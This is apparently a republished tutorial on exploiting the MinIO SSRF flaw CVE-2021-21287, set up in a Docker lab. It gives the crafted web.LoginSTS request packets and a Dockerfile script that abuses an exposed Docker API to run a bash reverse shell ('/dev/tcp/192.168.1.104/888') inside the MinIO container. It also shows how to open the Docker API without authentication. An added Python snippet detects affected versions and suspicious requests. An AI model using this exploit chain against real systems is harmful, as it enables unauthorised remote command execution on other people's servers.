2025-01-24 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
This article shows how to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287. The content is concise and easy to understand; I hope the detailed walkthrough below is useful to you.
MinIO unauthorized SSRF vulnerability (CVE-2021-21287)
I. Brief introduction of the vulnerability
Because the LoginSTS interface in MinIO is improperly designed, MinIO contains a server-side request forgery (SSRF) vulnerability.
An attacker can trigger the server-side request by constructing a URL. An attacker who successfully exploits this vulnerability can use server-side functionality to read or update internal resources, or execute arbitrary commands.
The vulnerability can be exploited remotely without user authentication.
II. Affected versions
MinIO < RELEASE.2021-01-30T00-20-58Z

III. Environment preparation & vulnerability reproduction
Install MinIO with Docker. docker-compose.yml:

version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:

Start the environment. Home page:
http://192.168.1.108:9000/minio/login
1. Verify the SSRF
Request packet:

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.104:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 79

{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}
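As an added example that is not part of the original article, the following Python check covers the two facts above from the defender's side: whether a MinIO release tag predates the fixed build, and whether a captured /minio/webrpc request is a web.LoginSTS call whose Host header names something other than the deployment's own listeners, as the packet above does. The allowlist of listener addresses and the sample request are assumptions constructed for the example.

```python
import json
import re
from datetime import datetime

# Fix version stated on the page: builds before this tag are affected.
FIXED_RELEASE = "RELEASE.2021-01-30T00-20-58Z"
_TAG_RE = re.compile(r"^RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z$")


def parse_release(tag):
    """Turn a MinIO tag such as RELEASE.2021-01-16T02-19-44Z into a datetime."""
    m = _TAG_RE.match(tag.strip())
    if not m:
        raise ValueError(f"not a MinIO release tag: {tag!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S")


def is_affected(tag):
    """True when the running build predates the fix for CVE-2021-21287."""
    return parse_release(tag) < parse_release(FIXED_RELEASE)


def suspicious_loginsts(raw_request, expected_hosts):
    """Return a reason string if raw_request is a web.LoginSTS call whose Host
    header is not one of this deployment's own listeners (assumed allowlist),
    otherwise None. Expects one full HTTP request: headers, blank line, body."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines[0].startswith("POST /minio/webrpc"):
        return None
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    try:
        rpc = json.loads(body)
    except ValueError:
        return None
    if rpc.get("method") != "web.LoginSTS":
        return None
    host = headers.get("host", "")
    if host in expected_hosts:
        return None
    return f"web.LoginSTS with foreign Host header {host!r}"


# Constructed sample modelled on the packet shown above; not a real capture.
SAMPLE_REQUEST = (
    "POST /minio/webrpc HTTP/1.1\r\nHost: 192.168.1.104:1234\r\n"
    "Content-Type: application/json\r\nContent-Length: 79\r\n\r\n"
    '{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}'
)
```

Running `is_affected` against the compose image above returns True, and `suspicious_loginsts(SAMPLE_REQUEST, {"192.168.1.108:9000"})` flags the foreign Host header.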
2. SSRF to reverse shell
Place the file under the web service as index.php (Apache).
Reverse shell file:
The Dockerfile is as follows:

FROM alpine:3.13
RUN apk add curl bash jq
RUN set -ex && \
    { \
    echo '#!/bin/bash'; \
    echo 'set -ex'; \
    echo 'target="http://192.168.1.108:2375"'; \
    echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; \
    echo 'for item in ${jsons[@]}; do'; \
    echo '  name=$(echo $item | base64 -d | jq -r ".Image")'; \
    echo '  if [[ "$name" == *"minio/minio"* ]]; then'; \
    echo '    id=$(echo $item | base64 -d | jq -r ".ID")'; \
    echo '    break'; \
    echo '  fi'; \
    echo 'done'; \
    echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{\"Cmd\": [\"bash\", \"-c\", \"bash -i >& /dev/tcp/192.168.1.104/888 0>&1\"]}" | jq -r ".ID")'; \
    echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; \
    } | bash
Exploitation request packet:

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 79

{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}
A short video was recorded to present the process more clearly.
The process is tedious and the wait is long, so background music has been added.
Video:
Result of running the steps in the video:
https://mp.weixin.qq.com/s/9OavrcdczSZDXler5IpiQQ
Note ⚠️:
The step of enabling the Docker API is not shown in the video because the Docker API was already enabled on my own machine.
Reference for enabling the Docker API:
Open the service configuration file, find
ExecStart=/usr/bin/dockerd
and change it to
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
then restart the daemon:
$ systemctl daemon-reload
$ systemctl restart docker
Binding the daemon to tcp://0.0.0.0:2375 exposes the Docker API to every host that can reach the machine, with no TLS and no authentication; that exposure is exactly what the reverse-shell step above depends on.
The above is how to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287.